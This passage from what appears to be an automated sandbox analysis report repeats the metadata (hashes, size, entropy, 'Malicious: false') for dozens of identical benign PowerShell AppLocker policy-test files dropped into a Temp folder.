SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4xolpq0j.mm5.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4xxjtvqg.plp.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4z3jsfne.wa2.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5evtew0d.zre.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5jlsry5f.spc.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a0ddlqln.jsk.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a3kroy3r.3bl.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ahkuxwts.jq4.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_allpprvp.2or.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bae1pfus.4i0.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bxuemkhd.gch.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_byf4edbn.5nc.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c22j51rn.pvs.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cji2lpdr.apt.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cnay3j2a.3yo.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cyguycri.b31.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dadfy2hb.vbi.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_echbrcil.mxw.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eeh001vx.uf4.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eioj1h44.auj.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ejmrqtdy.txr.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f0c02saq.ry3.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fffa31vy.lpb.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g053wqia.5f3.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g0mrmy4w.ad3.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gic0lkna.t1w.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_go2uhjdc.g1j.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h2bhnb4r.me5.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jy1py0ne.zi0.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k3oflc0u.tvu.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kbmldz4e.1t4.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kw2knbgk.0ft.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l1pbcpff.3gi.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lhenigmw.1jj.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lkiaiofx.p3b.psm1

Download File

